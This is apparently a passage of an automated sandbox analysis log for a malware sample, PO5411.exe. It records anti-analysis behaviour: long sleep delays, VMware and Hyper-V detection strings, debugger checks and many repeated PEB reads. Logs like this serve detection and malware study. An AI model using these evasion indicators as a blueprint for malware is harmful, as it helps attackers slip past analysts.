                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4774Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2261Jump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exe TID: 6792Thread sleep time: -33000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exe TID: 6856Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6168Thread sleep count: 4774 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4612Thread sleep count: 2261 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6092Thread sleep count: 58 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6820Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011F31DC FindFirstFileW,FindNextFileW,FindClose,21_2_011F31DC
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011D85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,21_2_011D85EA
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011E245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,21_2_011E245C
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011DB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,21_2_011DB89C
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011E68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,21_2_011E68BA
                      Source: C:\Users\user\Desktop\PO5411.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: powershell.exe, 0000000E.00000003.875803896.0000000005020000.00000004.00000001.sdmpBinary or memory string: Hyper-V
                      Source: explorer.exe, 00000012.00000002.925492655.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: explorer.exe, 00000012.00000000.822438915.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: PO5411.exe, 00000001.00000002.787808714.0000000002843000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: powershell.exe, 0000000E.00000003.875803896.0000000005020000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                      Source: explorer.exe, 00000012.00000000.815945491.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000012.00000000.822438915.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000012.00000000.809410886.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
                      Source: explorer.exe, 00000012.00000002.925492655.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: explorer.exe, 00000012.00000000.823701221.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
                      Source: explorer.exe, 00000012.00000002.925492655.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: explorer.exe, 00000012.00000000.826356192.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
                      Source: explorer.exe, 00000012.00000002.925492655.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_004088A0 rdtsc 17_2_004088A0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_00409B10 LdrLoadDll,17_2_00409B10
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011F2258 IsDebuggerPresent,21_2_011F2258
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01234120 mov eax, dword ptr fs:[00000030h]17_2_01234120
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01234120 mov eax, dword ptr fs:[00000030h]17_2_01234120
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01234120 mov eax, dword ptr fs:[00000030h]17_2_01234120
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01234120 mov eax, dword ptr fs:[00000030h]17_2_01234120
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01234120 mov ecx, dword ptr fs:[00000030h]17_2_01234120
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124513A mov eax, dword ptr fs:[00000030h]17_2_0124513A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124513A mov eax, dword ptr fs:[00000030h]17_2_0124513A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01219100 mov eax, dword ptr fs:[00000030h]17_2_01219100
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01219100 mov eax, dword ptr fs:[00000030h]17_2_01219100
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01219100 mov eax, dword ptr fs:[00000030h]17_2_01219100
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0121C962 mov eax, dword ptr fs:[00000030h]17_2_0121C962
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0121B171 mov eax, dword ptr fs:[00000030h]17_2_0121B171
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0121B171 mov eax, dword ptr fs:[00000030h]17_2_0121B171
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0123B944 mov eax, dword ptr fs:[00000030h]17_2_0123B944
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0123B944 mov eax, dword ptr fs:[00000030h]17_2_0123B944
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012461A0 mov eax, dword ptr fs:[00000030h]17_2_012461A0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012461A0 mov eax, dword ptr fs:[00000030h]17_2_012461A0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012969A6 mov eax, dword ptr fs:[00000030h]17_2_012969A6
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012951BE mov eax, dword ptr fs:[00000030h]17_2_012951BE
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012951BE mov eax, dword ptr fs:[00000030h]17_2_012951BE
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012951BE mov eax, dword ptr fs:[00000030h]17_2_012951BE
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012951BE mov eax, dword ptr fs:[00000030h]17_2_012951BE
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0123C182 mov eax, dword ptr fs:[00000030h]17_2_0123C182
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124A185 mov eax, dword ptr fs:[00000030h]17_2_0124A185
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01242990 mov eax, dword ptr fs:[00000030h]17_2_01242990
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0121B1E1 mov eax, dword ptr fs:[00000030h]17_2_0121B1E1
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0121B1E1 mov eax, dword ptr fs:[00000030h]17_2_0121B1E1
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0121B1E1 mov eax, dword ptr fs:[00000030h]17_2_0121B1E1
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012A41E8 mov eax, dword ptr fs:[00000030h]17_2_012A41E8
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0122B02A mov eax, dword ptr fs:[00000030h]17_2_0122B02A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0122B02A mov eax, dword ptr fs:[00000030h]17_2_0122B02A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0122B02A mov eax, dword ptr fs:[00000030h]17_2_0122B02A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0122B02A mov eax, dword ptr fs:[00000030h]17_2_0122B02A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124002D mov eax, dword ptr fs:[00000030h]17_2_0124002D
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124002D mov eax, dword ptr fs:[00000030h]17_2_0124002D
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124002D mov eax, dword ptr fs:[00000030h]17_2_0124002D
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124002D mov eax, dword ptr fs:[00000030h]17_2_0124002D
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124002D mov eax, dword ptr fs:[00000030h]17_2_0124002D
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E4015 mov eax, dword ptr fs:[00000030h]17_2_012E4015
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E4015 mov eax, dword ptr fs:[00000030h]17_2_012E4015
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01297016 mov eax, dword ptr fs:[00000030h]17_2_01297016
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01297016 mov eax, dword ptr fs:[00000030h]17_2_01297016
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01297016 mov eax, dword ptr fs:[00000030h]17_2_01297016
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E1074 mov eax, dword ptr fs:[00000030h]17_2_012E1074
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012D2073 mov eax, dword ptr fs:[00000030h]17_2_012D2073
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01230050 mov eax, dword ptr fs:[00000030h]17_2_01230050
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01230050 mov eax, dword ptr fs:[00000030h]17_2_01230050
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012420A0 mov eax, dword ptr fs:[00000030h]17_2_012420A0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012420A0 mov eax, dword ptr fs:[00000030h]17_2_012420A0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012420A0 mov eax, dword ptr fs:[00000030h]17_2_012420A0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012420A0 mov eax, dword ptr fs:[00000030h]17_2_012420A0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012420A0 mov eax, dword ptr fs:[00000030h]17_2_012420A0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012420A0 mov eax, dword ptr fs:[00000030h]17_2_012420A0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012590AF mov eax, dword ptr fs:[00000030h]17_2_012590AF
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124F0BF mov ecx, dword ptr fs:[00000030h]17_2_0124F0BF
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124F0BF mov eax, dword ptr fs:[00000030h]17_2_0124F0BF
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124F0BF mov eax, dword ptr fs:[00000030h]17_2_0124F0BF
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01219080 mov eax, dword ptr fs:[00000030h]17_2_01219080
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01293884 mov eax, dword ptr fs:[00000030h]17_2_01293884
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01293884 mov eax, dword ptr fs:[00000030h]17_2_01293884
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012158EC mov eax, dword ptr fs:[00000030h]17_2_012158EC
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012AB8D0 mov eax, dword ptr fs:[00000030h]17_2_012AB8D0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012AB8D0 mov ecx, dword ptr fs:[00000030h]17_2_012AB8D0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012AB8D0 mov eax, dword ptr fs:[00000030h]17_2_012AB8D0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012AB8D0 mov eax, dword ptr fs:[00000030h]17_2_012AB8D0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012AB8D0 mov eax, dword ptr fs:[00000030h]17_2_012AB8D0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012AB8D0 mov eax, dword ptr fs:[00000030h]17_2_012AB8D0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012D131B mov eax, dword ptr fs:[00000030h]17_2_012D131B
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0121DB60 mov ecx, dword ptr fs:[00000030h]17_2_0121DB60
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01243B7A mov eax, dword ptr fs:[00000030h]17_2_01243B7A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01243B7A mov eax, dword ptr fs:[00000030h]17_2_01243B7A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0121DB40 mov eax, dword ptr fs:[00000030h]17_2_0121DB40
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E8B58 mov eax, dword ptr fs:[00000030h]17_2_012E8B58
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0121F358 mov eax, dword ptr fs:[00000030h]17_2_0121F358
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01244BAD mov eax, dword ptr fs:[00000030h]17_2_01244BAD
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01244BAD mov eax, dword ptr fs:[00000030h]17_2_01244BAD
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01244BAD mov eax, dword ptr fs:[00000030h]17_2_01244BAD
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E5BA5 mov eax, dword ptr fs:[00000030h]17_2_012E5BA5
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012D138A mov eax, dword ptr fs:[00000030h]17_2_012D138A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012CD380 mov ecx, dword ptr fs:[00000030h]17_2_012CD380
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01221B8F mov eax, dword ptr fs:[00000030h]17_2_01221B8F
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01221B8F mov eax, dword ptr fs:[00000030h]17_2_01221B8F
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01242397 mov eax, dword ptr fs:[00000030h]17_2_01242397
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124B390 mov eax, dword ptr fs:[00000030h]17_2_0124B390
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012403E2 mov eax, dword ptr fs:[00000030h]17_2_012403E2
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012403E2 mov eax, dword ptr fs:[00000030h]17_2_012403E2
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012403E2 mov eax, dword ptr fs:[00000030h]17_2_012403E2
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012403E2 mov eax, dword ptr fs:[00000030h]17_2_012403E2
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012403E2 mov eax, dword ptr fs:[00000030h]17_2_012403E2
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012403E2 mov eax, dword ptr fs:[00000030h]17_2_012403E2
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0123DBE9 mov eax, dword ptr fs:[00000030h]17_2_0123DBE9
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012953CA mov eax, dword ptr fs:[00000030h]17_2_012953CA
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012953CA mov eax, dword ptr fs:[00000030h]17_2_012953CA
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01254A2C mov eax, dword ptr fs:[00000030h]17_2_01254A2C
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01254A2C mov eax, dword ptr fs:[00000030h]17_2_01254A2C
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01228A0A mov eax, dword ptr fs:[00000030h]17_2_01228A0A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01215210 mov eax, dword ptr fs:[00000030h]17_2_01215210
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01215210 mov ecx, dword ptr fs:[00000030h]17_2_01215210
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01215210 mov eax, dword ptr fs:[00000030h]17_2_01215210
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01215210 mov eax, dword ptr fs:[00000030h]17_2_01215210
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0121AA16 mov eax, dword ptr fs:[00000030h]17_2_0121AA16
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0121AA16 mov eax, dword ptr fs:[00000030h]17_2_0121AA16
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012DAA16 mov eax, dword ptr fs:[00000030h]17_2_012DAA16
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012DAA16 mov eax, dword ptr fs:[00000030h]17_2_012DAA16
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01233A1C mov eax, dword ptr fs:[00000030h]17_2_01233A1C
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012CB260 mov eax, dword ptr fs:[00000030h]17_2_012CB260
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012CB260 mov eax, dword ptr fs:[00000030h]17_2_012CB260
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E8A62 mov eax, dword ptr fs:[00000030h]17_2_012E8A62
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0125927A mov eax, dword ptr fs:[00000030h]17_2_0125927A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01219240 mov eax, dword ptr fs:[00000030h]17_2_01219240
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01219240 mov eax, dword ptr fs:[00000030h]17_2_01219240
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01219240 mov eax, dword ptr fs:[00000030h]17_2_01219240
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01219240 mov eax, dword ptr fs:[00000030h]17_2_01219240
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012DEA55 mov eax, dword ptr fs:[00000030h]17_2_012DEA55
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012A4257 mov eax, dword ptr fs:[00000030h]17_2_012A4257
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012152A5 mov eax, dword ptr fs:[00000030h]17_2_012152A5
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012152A5 mov eax, dword ptr fs:[00000030h]17_2_012152A5
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012152A5 mov eax, dword ptr fs:[00000030h]17_2_012152A5
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012152A5 mov eax, dword ptr fs:[00000030h]17_2_012152A5
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012152A5 mov eax, dword ptr fs:[00000030h]17_2_012152A5
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0122AAB0 mov eax, dword ptr fs:[00000030h]17_2_0122AAB0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0122AAB0 mov eax, dword ptr fs:[00000030h]17_2_0122AAB0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124FAB0 mov eax, dword ptr fs:[00000030h]17_2_0124FAB0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124D294 mov eax, dword ptr fs:[00000030h]17_2_0124D294
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124D294 mov eax, dword ptr fs:[00000030h]17_2_0124D294
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01242AE4 mov eax, dword ptr fs:[00000030h]17_2_01242AE4
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01242ACB mov eax, dword ptr fs:[00000030h]17_2_01242ACB
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0121AD30 mov eax, dword ptr fs:[00000030h]17_2_0121AD30
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012DE539 mov eax, dword ptr fs:[00000030h]17_2_012DE539
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01223D34 mov eax, dword ptr fs:[00000030h]17_2_01223D34
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01223D34 mov eax, dword ptr fs:[00000030h]17_2_01223D34
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01223D34 mov eax, dword ptr fs:[00000030h]17_2_01223D34
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01223D34 mov eax, dword ptr fs:[00000030h]17_2_01223D34
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01223D34 mov eax, dword ptr fs:[00000030h]17_2_01223D34
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01223D34 mov eax, dword ptr fs:[00000030h]17_2_01223D34
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01223D34 mov eax, dword ptr fs:[00000030h]17_2_01223D34
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01223D34 mov eax, dword ptr fs:[00000030h]17_2_01223D34
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01223D34 mov eax, dword ptr fs:[00000030h]17_2_01223D34
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01223D34 mov eax, dword ptr fs:[00000030h]17_2_01223D34
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01223D34 mov eax, dword ptr fs:[00000030h]17_2_01223D34
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01223D34 mov eax, dword ptr fs:[00000030h]17_2_01223D34
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01223D34 mov eax, dword ptr fs:[00000030h]17_2_01223D34
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E8D34 mov eax, dword ptr fs:[00000030h]17_2_012E8D34
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0129A537 mov eax, dword ptr fs:[00000030h]17_2_0129A537
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01244D3B mov eax, dword ptr fs:[00000030h]17_2_01244D3B
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01244D3B mov eax, dword ptr fs:[00000030h]17_2_01244D3B
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01244D3B mov eax, dword ptr fs:[00000030h]17_2_01244D3B
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0123C577 mov eax, dword ptr fs:[00000030h]17_2_0123C577
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0123C577 mov eax, dword ptr fs:[00000030h]17_2_0123C577
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01253D43 mov eax, dword ptr fs:[00000030h]17_2_01253D43
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01293540 mov eax, dword ptr fs:[00000030h]17_2_01293540
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01237D50 mov eax, dword ptr fs:[00000030h]17_2_01237D50
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E05AC mov eax, dword ptr fs:[00000030h]17_2_012E05AC
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E05AC mov eax, dword ptr fs:[00000030h]17_2_012E05AC
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012435A1 mov eax, dword ptr fs:[00000030h]17_2_012435A1
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01241DB5 mov eax, dword ptr fs:[00000030h]17_2_01241DB5
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01241DB5 mov eax, dword ptr fs:[00000030h]17_2_01241DB5
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01241DB5 mov eax, dword ptr fs:[00000030h]17_2_01241DB5
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01242581 mov eax, dword ptr fs:[00000030h]17_2_01242581
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01242581 mov eax, dword ptr fs:[00000030h]17_2_01242581
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01242581 mov eax, dword ptr fs:[00000030h]17_2_01242581
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01242581 mov eax, dword ptr fs:[00000030h]17_2_01242581
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01212D8A mov eax, dword ptr fs:[00000030h]17_2_01212D8A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01212D8A mov eax, dword ptr fs:[00000030h]17_2_01212D8A
